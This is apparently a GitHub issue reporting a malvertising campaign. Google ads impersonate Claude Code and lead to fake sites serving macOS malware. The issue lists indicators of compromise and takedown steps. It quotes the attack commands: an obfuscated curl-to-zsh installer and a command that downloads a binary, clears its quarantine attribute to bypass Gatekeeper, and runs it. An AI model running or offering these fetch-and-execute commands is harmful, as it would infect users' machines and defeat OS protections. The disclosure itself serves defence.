Malicious Google Ad impersonating Claude Code — distributes macOS malware

Resolved 💬 3 comments Opened Feb 25, 2026 by marek-vybiral Closed Mar 25, 2026

Summary

A sponsored Google Ad for the search query "claude code" leads to a fake website at cl-code.it.com that distributes macOS malware disguised as a Claude Code install script. As of 2025-02-25, this is the no. 1 result (sponsored) for that query.

Additional malicious sponsored results were found for the query "claude code install":

  • claude-code-macos.com
  • relatestudios.com

Both use the same title: "Install Claude Code for macOS - Claude Code Docs"

Attack Chain

The fake site presents an install command:

curl -ksfLS $(echo 'aHR0cHM6Ly9jb250YXRvcGx1cy5jb20...<redacted>'|base64 -D)| zsh

Three layers of obfuscation:

  1. The base64 string decodes to https://contatoplus.com/curl/8d2d275360adedecfbbd91567daddeed80d20aceb8aa4320d06a21486493945b
  2. That URL returns a base64+gzip-encoded shell script
  3. Which downloads and executes an unsigned macOS binary:
curl -o /tmp/helper https://contatoplus.com/n8n/update && xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper

The xattr -c specifically bypasses macOS Gatekeeper quarantine protection.

Google Ads Advertiser Info

Indicators of Compromise

| Indicator | Value |
|---|---|
| Phishing domain | cl-code.it.com |
| Phishing domain | claude-code-macos.com |
| Phishing domain | relatestudios.com |
| Payload host | contatoplus.com |
| Payload URL | contatoplus.com/n8n/update |
| Dropped binary | /tmp/helper |
| Google Ads campaign ID | 23605260130 |

Recommendation

  • Request takedown of the Google Ad (campaign ID 23605260130)
  • Request takedown of cl-code.it.com, claude-code-macos.com, relatestudios.com, and contatoplus.com
  • Consider a security advisory warning users to only install Claude Code via npm or the official docs

View original on GitHub ↗

This issue has 3 comments on GitHub. Read the full discussion on GitHub ↗